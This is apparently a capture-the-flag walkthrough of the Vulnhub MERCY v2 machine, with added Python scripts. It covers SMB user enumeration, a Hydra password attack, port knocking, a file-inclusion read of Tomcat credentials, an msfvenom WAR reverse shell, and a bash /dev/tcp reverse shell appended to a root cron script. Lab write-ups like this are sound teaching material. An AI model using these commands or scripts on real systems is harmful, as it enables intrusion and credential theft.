Vulnhub - DIGITALWORLD.LOCAL: MERCY V2
Introduction
MERCY is a machine dedicated to Offensive Security for the PWK course, and to a great friend of mine who was there to share my sufferance with me. :-)
MERCY is a name-play on some aspects of the PWK course. It is NOT a hint for the box.
Note: Some report a kernel privilege escalation works on this machine. If it does, try harder! There is another vector that you should try!
This box is on the NetSecFocus Admin list of OSCP-like machines. It’s MERCY from vulnhub.
Ports
We have quite a few ports:
- 22/tcp filtered ssh
- 53/tcp open domain
- 80/tcp filtered http
- 110/tcp open pop3
- 139/tcp open netbios-ssn
- 143/tcp open imap
- 445/tcp open microsoft-ds
- 993/tcp open imaps
- 995/tcp open pop3s
- 8080/tcp open http-proxy
So: SSH (filtered), DNS, HTTP (filtered), mail with SSL, SMB and another HTTP port. Whew! Note that "filtered" means something is dropping our packets to 22 and 80 rather than the services being absent; that matters later.
8080
Port 8080 is running Apache Tomcat 7, but it’s just the front page - we have no creds. There is a robots.txt pointing to:
http://192.168.1.169:8080/tryharder/tryharder
Here we find some base64-encoded text that decodes to a message warning about weak passwords, and specifically mentioning "password".
We’ll come back to Tomcat later.
SMB
I didn’t do this whole thing without hints. Maybe 50% of it. I’ve been taking the attitude if I’m not getting anywhere after some time then get a hint; hopefully it will produce some learning rather than making me lazy. I’m not doing this for imaginary internet points.
Anyway; SMB. I could see the shares with smbclient and smbmap:
root@kali:/opt/vulnhub/mercy# smbclient -L //192.168.1.169
Enter WORKGROUP\root's password:
        Sharename       Type      Comment
        ---------       ----      -------
        print$          Disk      Printer Drivers
        qiu             Disk
        IPC$            IPC       IPC Service (MERCY server (Samba, Ubuntu))
SMB1 disabled -- no workgroup available
root@kali:/opt/vulnhub/mercy# smbmap -u '' -H 192.168.1.169
[+] Guest session       IP: 192.168.1.169:445   Name: 192.168.1.169
        Disk            Permissions     Comment
        ----            -----------     -------
        print$          NO ACCESS       Printer Drivers
        qiu             NO ACCESS
        IPC$            NO ACCESS       IPC Service (MERCY server (Samba, Ubuntu))
root@kali:/opt/vulnhub/mercy#
But I couldn't log in to any of them without creds. While I had used it before, I didn't think to try enum4linux, which is exactly what's needed here: it enumerates users over the anonymous (null) session even though the shares themselves deny access:
root@kali:/opt/vulnhub/mercy# enum4linux 192.168.1.169
With that, enum4linux's RID cycling gives us four local users:
S-1-22-1-1000 Unix User\pleadformercy (Local User)
S-1-22-1-1001 Unix User\qiu (Local User)
S-1-22-1-1002 Unix User\thisisasuperduperlonguser (Local User)
S-1-22-1-1003 Unix User\fluffy (Local User)
SMB, logged in
I tried running my users against POP3, SMB and the HTTP basic authentication on Tomcat with Hydra but wasn't getting anywhere. I checked a hint and the SMB password for user qiu was literally password; this should have broken almost immediately. And in fact it does fall to a short list of probable passwords:
root@kali:/opt/vulnhub/mercy# hydra -L users -P /usr/share/seclists/Passwords/probable-v2-top207.txt smb://192.168.1.169
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2020-12-21 06:24:35
[INFO] Reduced number of tasks to 1 (smb does not like parallel connections)
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 1 task per 1 server, overall 1 task, 621 login tries (l:3/p:207), ~621 tries per task
[DATA] attacking smb://192.168.1.169:445/
[445][smb] host: 192.168.1.169 login: qiu password: password
1 of 1 target successfully completed, 1 valid password found
I have no idea why it didn’t work with rockyou.
Anyway: with qiu:password we can log into the qiu share, and in a directory called opensesame we find a config file, partially reproduced here:
root@kali:/opt/vulnhub/mercy/opensesame# cat config
Here are settings for your perusal.
Port Knocking Daemon Configuration
[options]
UseSyslog
[openHTTP]
sequence = 159,27391,4
seq_timeout = 100
command = /sbin/iptables -I INPUT -s %IP% -p tcp --dport 80 -j ACCEPT
tcpflags = syn
So port knocking is enabled on the target, and now we know the sequence: a TCP SYN to 159, then 27391, then 4, all within seq_timeout (100 seconds), after which knockd runs the iptables command. That rule accepts port 80 only from the knocking address (%IP%), so the knock has to come from the same IP we will browse from. Because tcpflags = syn, a plain connect attempt is enough; whether the connection is refused or dropped doesn't matter, the SYN is what knockd watches for.
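Scripting the knock from the config itself, as an added example that is not part of the original write-up. It parses knockd's INI-style file (the fragment below is the one recovered from the share, embedded here as constructed sample input), replays the sequence with plain TCP connects, and checks port 80 before and after. The target address 192.168.1.169 is the write-up's and is only used when the script is run directly; the parser is what is exercised offline.

```python
"""Parse a knockd.conf and replay its knock sequence (added example)."""
import configparser
import socket
import time

# Constructed sample input: the config recovered from the qiu share.
KNOCKD_CONF = """Here are settings for your perusal.
Port Knocking Daemon Configuration
[options]
UseSyslog
[openHTTP]
sequence = 159,27391,4
seq_timeout = 100
command = /sbin/iptables -I INPUT -s %IP% -p tcp --dport 80 -j ACCEPT
tcpflags = syn
"""


def parse_knockd_conf(text):
    """Return {name: {sequence, seq_timeout, tcpflags, command}} for every
    knock section, i.e. every section other than [options]."""
    lines = text.splitlines()
    # knockd ignores junk before the first section (this file starts with two
    # banner lines); configparser does not, so skip up to the first header.
    start = next(i for i, line in enumerate(lines) if line.strip().startswith("["))
    # allow_no_value: 'UseSyslog' has no '='; interpolation=None: '%IP%' would
    # otherwise be treated as a configparser substitution and raise.
    cp = configparser.ConfigParser(allow_no_value=True, interpolation=None)
    cp.read_string("\n".join(lines[start:]))
    knocks = {}
    for name in cp.sections():
        if name == "options":
            continue
        sec = cp[name]
        sequence = []
        for item in sec["sequence"].split(","):
            # knockd allows an explicit protocol per port, e.g. 7000:udp; default tcp
            port, _, proto = item.strip().partition(":")
            sequence.append((int(port), proto or "tcp"))
        knocks[name] = {
            "sequence": sequence,
            "seq_timeout": sec.getint("seq_timeout", fallback=None),
            "tcpflags": sec.get("tcpflags", ""),
            "command": sec.get("command", ""),
        }
    return knocks


def knock(host, sequence, delay=0.1):
    """Send the knock: one connect() attempt per TCP port (knockd only needs
    the SYN, the refused/dropped reply is irrelevant) or one UDP datagram.
    Must run from the IP that will use port 80 afterwards, since the
    iptables rule is keyed on %IP%. delay mirrors knock's -d, in seconds."""
    for port, proto in sequence:
        if proto == "udp":
            s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
            s.sendto(b"", (host, port))
        else:
            s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            s.settimeout(0.5)
            try:
                s.connect((host, port))
            except OSError:
                pass  # expected on a closed or filtered port
        s.close()
        time.sleep(delay)


def port_open(host, port, timeout=2.0):
    """True if a TCP connect to host:port succeeds."""
    try:
        with socket.create_connection((host, port), timeout=timeout):
            return True
    except OSError:
        return False


if __name__ == "__main__":
    target = "192.168.1.169"  # the write-up's target; assumption for the demo
    rule = parse_knockd_conf(KNOCKD_CONF)["openHTTP"]
    print("port 80 before knock:", port_open(target, 80))
    knock(target, rule["sequence"])
    print("port 80 after knock: ", port_open(target, 80))
```

The config shows no matching close section, so once opened the rule stays in place for that source address until the box reboots or the iptables rule is removed.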
Knock knock
I didn't have knock installed on this box (it comes in the knockd package), so I installed it, sent the sequence and then ran nmap again to see whether port 80 had opened - success!
root@kali:/opt/vulnhub/mercy# apt install knockd
Reading package lists... Done
Building dependency tree
Reading state information... Done
The following NEW packages will be installed:
knockd
0 upgraded, 1 newly installed, 0 to remove and 142 not upgraded.
Need to get 25.8 kB of archives.
After this operation, 104 kB of additional disk space will be used.
Get:1 http://kali.download/kali kali-rolling/main amd64 knockd amd64 0.7-1+b1 [25.8 kB]
Fetched 25.8 kB in 3s (8,248 B/s)
Selecting previously unselected package knockd.
(Reading database ... 292737 files and directories currently installed.)
Preparing to unpack .../knockd_0.7-1+b1_amd64.deb ...
Unpacking knockd (0.7-1+b1) ...
Setting up knockd (0.7-1+b1) ...
update-rc.d: We have no instructions for the knockd init script.
update-rc.d: It looks like a network service, we disable it.
Processing triggers for man-db (2.9.3-2) ...
Processing triggers for kali-menu (2021.1.1) ...
root@kali:/opt/vulnhub/mercy# knock 192.168.1.169 159 27391 4 -d 100
root@kali:/opt/vulnhub/mercy# nmap 192.168.1.169
Starting Nmap 7.91 ( https://nmap.org ) at 2020-12-21 04:01 EST
Nmap scan report for 192.168.1.169
Host is up (0.0036s latency).
Not shown: 990 closed ports
PORT STATE SERVICE
22/tcp filtered ssh
53/tcp open domain
80/tcp open http
*SNIP*
HTTP
On the website we can find robots.txt, which shows us /mercy and /nomercy. At /nomercy we find an install of RIPS 0.53, which searchsploit tells us has multiple local file inclusion vulnerabilities.
The file parameter of windows/code.php is the one to use, and it didn't take me long to figure out this was the way to find the Tomcat credentials, since the traversal reaches /etc/tomcat7/tomcat-users.xml:
http://192.168.1.169/nomercy/windows/code.php?file=../../../../../../etc/tomcat7/tomcat-users.xml
This was quite similar to Tabby from HTB.
<role rolename="admin-gui"/>
<role rolename="manager-gui"/>
<user username="thisisasuperduperlonguser" password="heartbreakisinevitable" roles="admin-gui,manager-gui"/>
<user username="fluffy" password="freakishfluffybunny" roles="none"/>
So then we could log in to Tomcat as thisisasuperduperlonguser. Note the roles: manager-gui grants the HTML manager application at /manager/html (the text API at /manager/text, which deploy scripts use, would need manager-script), and that is enough to deploy a WAR through the browser. fluffy's roles="none" gives nothing in Tomcat, but fluffy is also one of the local users enum4linux found, so that password is worth keeping.
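Pulling the file through the traversal and reading the roles out of it programmatically, as an added example that is not part of the original write-up. The URL and traversal path are the ones used above; the HTML wrapper around the XML in the sample response is constructed (it assumes code.php echoes the included file, HTML-entity encoded, inside its own page, which is why the body is unescaped before the tomcat-users element is cut out).

```python
"""Read tomcat-users.xml via the RIPS LFI and list manager-capable accounts."""
import html
import urllib.parse
import urllib.request
import xml.etree.ElementTree as ET

LFI_URL = "http://192.168.1.169/nomercy/windows/code.php"  # from the write-up
TOMCAT_USERS = "/etc/tomcat7/tomcat-users.xml"

# Tomcat 7 checks these per interface: manager-gui for /manager/html,
# manager-script for /manager/text, admin-gui/admin-script for host-manager.
INTERESTING_ROLES = {"manager-gui", "manager-script", "manager-jmx",
                     "admin-gui", "admin-script"}

# Constructed sample response: the users are those recovered from MERCY,
# the surrounding HTML is an assumption about how code.php renders a file.
SAMPLE_RESPONSE = """<html><body><pre>
&lt;tomcat-users&gt;
&lt;role rolename="admin-gui"/&gt;
&lt;role rolename="manager-gui"/&gt;
&lt;user username="thisisasuperduperlonguser" password="heartbreakisinevitable" roles="admin-gui,manager-gui"/&gt;
&lt;user username="fluffy" password="freakishfluffybunny" roles="none"/&gt;
&lt;/tomcat-users&gt;
</pre></body></html>"""


def lfi_url(path, depth=6):
    """Build the traversal URL: depth '../' segments then the absolute path
    with its leading slash stripped, so it resolves wherever code.php lives."""
    return LFI_URL + "?file=" + urllib.parse.quote("../" * depth + path.lstrip("/"))


def fetch(path, timeout=5):
    """Request the file through the LFI and return the response body."""
    with urllib.request.urlopen(lfi_url(path), timeout=timeout) as resp:
        return resp.read().decode("utf-8", "replace")


def extract_xml(body):
    """Cut the tomcat-users document out of the page that wraps it."""
    text = html.unescape(body)
    start = text.find("<tomcat-users")
    end = text.find("</tomcat-users>")
    if start == -1 or end == -1:
        raise ValueError("no tomcat-users element in response")
    return text[start:end + len("</tomcat-users>")]


def parse_tomcat_users(xml_text):
    """Return [(username, password, set_of_roles)] for every <user>.
    Matches on local tag name so a namespaced file (Tomcat 8+) also works."""
    root = ET.fromstring(xml_text)
    users = []
    for el in root.iter():
        if el.tag.rsplit("}", 1)[-1] != "user":
            continue
        roles = {r.strip() for r in el.get("roles", "").split(",") if r.strip()}
        roles.discard("none")  # not a real role; treat as no roles
        users.append((el.get("username"), el.get("password"), roles))
    return users


def manager_accounts(users):
    """Accounts whose roles open any manager or host-manager interface."""
    return [(u, p, sorted(roles & INTERESTING_ROLES))
            for u, p, roles in users if roles & INTERESTING_ROLES]


if __name__ == "__main__":
    for user, pw, roles in manager_accounts(parse_tomcat_users(extract_xml(fetch(TOMCAT_USERS)))):
        print(f"{user}:{pw}  roles={','.join(roles)}")
```

Run against the live box it prints only thisisasuperduperlonguser; fluffy is filtered out because "none" grants nothing in Tomcat, which is exactly why that password matters on the host rather than in the manager.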
Tomcat
With the Tomcat manager GUI we could upload a WAR file generated by msfvenom:
root@kali:/opt/vulnhub/mercy# msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.1.150 LPORT=1234 -f war > shell.war
Deploying it through the manager's upload form and then browsing to the new /shell context runs the JSP, which connects back to a listener on 192.168.1.150:1234, and then we had a shell.
Fluffy
Since we already had a password for fluffy from tomcat-users.xml, we should try it with su:
uid=116(tomcat7) gid=126(tomcat7) groups=126(tomcat7)
python -c 'import pty;pty.spawn("/bin/bash");'
tomcat7@MERCY:/var/lib/tomcat7$ su fluffy
Password: freakishfluffybunny
$ python -c 'import pty;pty.spawn("/bin/bash");'
fluffy@MERCY:/var/lib/tomcat7$ cd /home/fluffy
Once we're there we find, under ~/.private/secrets, a script called timeclock which root runs from cron. The cron entry itself isn't visible to us, so that part isn't obvious. What is (or should be) obvious from the listing is that the file is owned by root yet world-writable (-rwxrwxrwx), so anything we append to it will run as root:
fluffy@MERCY:~/.private/secrets$ ls -lash
total 20K
4.0K drwxr-xr-x 2 fluffy fluffy 4.0K Nov 20  2018 .
4.0K drwxr-xr-x 3 fluffy fluffy 4.0K Nov 20  2018 ..
4.0K -rwxr-xr-x 1 fluffy fluffy   37 Nov 20  2018 backup.save
4.0K -rw-r--r-- 1 fluffy fluffy   12 Nov 20  2018 .secrets
4.0K -rwxrwxrwx 1 root   root    222 Nov 20  2018 timeclock
fluffy@MERCY:~/.private/secrets$ printf 'bash -i >& /dev/tcp/192.168.1.150/1235 0>&1\n' >> timeclock
Now we start a listener and wait for cron to run the script:
root@kali:/opt/vulnhub/mercy# nc -nvlp 1235
listening on [any] 1235 ...
connect to [192.168.1.150] from (UNKNOWN) [192.168.1.169] 51992
bash: cannot set terminal process group (24445): Inappropriate ioctl for device
bash: no job control in this shell
root@MERCY:~# ls -lash
total 56K
4.0K drwx------  3 root root 4.0K Sep  1  2018 .
4.0K drwxr-xr-x 21 root root 4.0K Aug 27  2018 ..
4.0K drwx------  2 root root 4.0K Aug 24  2018 .aptitude
4.0K ----------  1 root root 1.3K Sep  1  2018 author-secret.txt
4.0K -rw-------  1 root root  204 Nov 20  2018 .bash_history
4.0K -rw-r--r--  1 root root 3.1K Feb 20  2014 .bashrc
 20K -rw-r--r--  1 qiu  qiu   18K Dec 21 18:55 config
4.0K -rw-r--r--  1 root root  140 Feb 20  2014 .profile
4.0K ----------  1 root root   38 Aug 25  2018 proof.txt
4.0K -rw-r--r--  1 root root   66 Aug 26  2018 .selected_editor
root@MERCY:~# cat proof.txt
Congratulations on rooting MERCY. :-)
BOOM.
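The check that finds timeclock without knowing about the cron job, as an added example that is not part of the original write-up: walk the filesystem for regular files owned by root (or any chosen uid) that are writable by everyone, or by a group the current user belongs to. Because the demo cannot create root-owned files, it builds a small constructed tree mirroring the listing above and scans it with the owner filter set to the current user; on a target you would run it against / with the default owner of root.

```python
"""Find root-owned files that other users can write to (added example)."""
import os
import stat
import sys
import tempfile


def writable_by_others(start="/", owner_uid=0, skip=("/proc", "/sys", "/dev", "/run")):
    """Return [(path, mode string)] for regular files under start that are
    owned by owner_uid and writable by the world, or writable by a group
    the calling user is in. Symlinks are not followed (lstat)."""
    my_groups = set(os.getgroups()) | {os.getgid()}
    hits = []
    for dirpath, dirnames, filenames in os.walk(start):
        if dirpath in skip:          # pseudo-filesystems: prune and move on
            dirnames[:] = []
            continue
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue             # vanished or unreadable; not our problem
            if not stat.S_ISREG(st.st_mode) or st.st_uid != owner_uid:
                continue
            world = bool(st.st_mode & stat.S_IWOTH)
            group = bool(st.st_mode & stat.S_IWGRP) and st.st_gid in my_groups
            if world or group:
                hits.append((path, stat.filemode(st.st_mode)))
    return hits


def build_demo_tree():
    """Constructed sample input modelled on ~/.private/secrets on MERCY:
    a world-writable 'timeclock' beside a normally permissioned 'backup.save'.
    Returns (root_dir, timeclock_path, backup_path)."""
    root = tempfile.mkdtemp(prefix="mercy-demo-")
    secrets = os.path.join(root, ".private", "secrets")
    os.makedirs(secrets)
    timeclock = os.path.join(secrets, "timeclock")
    backup = os.path.join(secrets, "backup.save")
    with open(timeclock, "w") as f:
        f.write("#!/bin/bash\ndate >> /tmp/timeclock.log\n")
    with open(backup, "w") as f:
        f.write("#!/bin/bash\ntar czf /tmp/backup.tgz .\n")
    os.chmod(timeclock, 0o777)   # -rwxrwxrwx, the misconfiguration
    os.chmod(backup, 0o755)      # -rwxr-xr-x, fine
    return root, timeclock, backup


def demo():
    """Scan the constructed tree as the current user (the demo files are
    ours, not root's, so the owner filter is our own uid)."""
    root, timeclock, backup = build_demo_tree()
    hits = dict(writable_by_others(start=root, owner_uid=os.getuid()))
    return hits, timeclock, backup


if __name__ == "__main__":
    if len(sys.argv) > 1:
        # real use on a target: python3 script.py /
        for path, mode in writable_by_others(start=sys.argv[1]):
            print(mode, path)
    else:
        hits, timeclock, backup = demo()
        print("flagged:", {os.path.basename(p): m for p, m in hits.items()})
```

Anything this prints that is also executable, or that lives somewhere a scheduler or service reads from, is a candidate for exactly the append-a-line trick used above; the script deliberately reports group-writable files only when you are actually in that group, since a root:root 775 file is no use to fluffy.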
Epilogue
Learnings:
- If SMB is open, run enum4linux: null-session user enumeration works even when every share says NO ACCESS
- Use a short password list first, don't go straight to rockyou
- Look at file permissions closely: a root-owned, world-writable script is a privilege escalation whether or not you can see the cron entry that runs it